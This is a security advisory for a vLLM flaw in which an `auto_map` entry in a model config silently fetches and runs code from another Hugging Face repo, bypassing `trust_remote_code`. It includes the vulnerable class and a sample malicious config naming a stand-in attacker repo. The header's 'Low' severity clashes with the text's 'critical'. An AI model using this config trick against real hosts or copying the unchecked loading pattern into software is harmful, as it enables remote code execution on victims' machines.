# vLLM vulnerable to remote code execution via transformers_utils/get_config
GHSA-8fr4-5q9j-m8gm · Severity: Low · CVSS 3.1 · Published Dec 2, 2025
### Summary
`vllm` has a critical remote code execution vector in a config class named `Nemotron_Nano_VL_Config`. When `vllm` loads a model config that contains an `auto_map` entry, the config class resolves that mapping with `get_class_from_dynamic_module(...)` and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the `auto_map` string. Crucially, this happens even when the caller explicitly sets `trust_remote_code=False` in `vllm.transformers_utils.config.get_config`. In practice, an attacker can publish a benign-looking frontend repo whose `config.json` points via `auto_map` to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host.
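To make the attack shape concrete, the following sketch shows what a malicious frontend repo's `config.json` could contain (the repo and class names are hypothetical). The `auto_map` value uses Hugging Face's `repo_id--module.ClassName` convention; the vulnerable code splits on `--` and reverses the halves to produce the arguments for `get_class_from_dynamic_module`:

```python
# Hypothetical contents of a benign-looking frontend repo's config.json.
# The "--" separator lets the auto_map entry name a DIFFERENT repo than
# the one the victim asked to load.
frontend_config = {
    "model_type": "Llama_Nemotron_Nano_VL",
    "vision_config": {
        "auto_map": {
            "AutoConfig": "attacker/malicious-backend--configuration_evil.EvilConfig"
        }
    },
}

mapping = frontend_config["vision_config"]["auto_map"]["AutoConfig"]
# The vulnerable code does split("--")[::-1], yielding
# (class_reference, repo_id) for get_class_from_dynamic_module:
args = mapping.split("--")[::-1]
print(args)  # ['configuration_evil.EvilConfig', 'attacker/malicious-backend']
```

Loading the frontend config thus causes `configuration_evil.py` to be fetched from `attacker/malicious-backend` and imported, which is where the attacker's code runs.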
### Details
The vulnerable code resolves and instantiates classes from `auto_map` entries without checking whether those entries point to a different repo or whether remote code execution is allowed.
```python
from transformers import PretrainedConfig
from transformers.dynamic_module_utils import get_class_from_dynamic_module


class Nemotron_Nano_VL_Config(PretrainedConfig):
    model_type = 'Llama_Nemotron_Nano_VL'

    def __init__(self, vision_config=None, **kwargs):
        super().__init__(**kwargs)
        if vision_config is not None:
            assert "auto_map" in vision_config and "AutoConfig" in vision_config["auto_map"]
            # <-- vulnerable dynamic resolution + instantiation happens here:
            # the "repo--module.Class" mapping is split and reversed, then the
            # named class is fetched (possibly from a different repo) and run,
            # with no trust_remote_code check.
            vision_auto_config = get_class_from_dynamic_module(
                *vision_config["auto_map"]["AutoConfig"].split("--")[::-1]
            )
            self.vision_config = vision_auto_config(**vision_config)
        else:
            self.vision_config = PretrainedConfig()
```
`get_class_from_dynamic_module(...)` is capable of fetching and importing code from the Hugging Face repo specified in the mapping. `trust_remote_code` is not enforced for this code path. As a result, a frontend repo can redirect the loader to any backend repo and cause code execution, bypassing the `trust_remote_code` guard.
### Impact
This is a critical vulnerability because it breaks the documented `trust_remote_code` safety boundary in a core model-loading utility. The vulnerable code lives in a common loading path, so any application, service, CI job, or developer machine that uses `vllm`’s transformer utilities to load configs can be affected. The attack requires only two repos and no user interaction beyond loading the frontend model. A successful exploit can execute arbitrary commands on the host.
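Until a patched vLLM is deployed, one defense-in-depth measure is to run with the Hugging Face Hub in offline mode, so that code not already present in the local cache cannot be downloaded at all. A sketch (note this blocks all Hub downloads, not just `auto_map` resolution, so models must be pre-cached):

```python
import os

# Set these BEFORE importing transformers/vllm: huggingface_hub and
# transformers then resolve files from the local cache only, and attempts
# to fetch new files (including remote dynamic modules) fail instead.
os.environ["HF_HUB_OFFLINE"] = "1"
os.environ["TRANSFORMERS_OFFLINE"] = "1"
```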
### Fixes
* https://github.com/vllm-project/vllm/pull/28126
### Affected AI Products
* vllm